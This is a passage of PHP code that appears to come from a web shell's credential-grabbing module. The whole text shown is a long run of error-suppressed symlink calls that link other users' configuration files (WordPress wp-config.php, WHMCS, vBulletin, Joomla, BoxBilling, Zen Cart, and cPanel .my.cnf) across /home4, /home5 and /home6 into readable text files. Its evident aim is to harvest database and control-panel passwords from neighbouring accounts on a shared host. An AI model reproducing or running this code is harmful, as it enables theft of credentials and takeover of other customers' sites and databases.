                                                                    @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home4/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home5
                                                                    @symlink('/home5/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home5/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home5/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home6
                                                                    @symlink('/home6/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
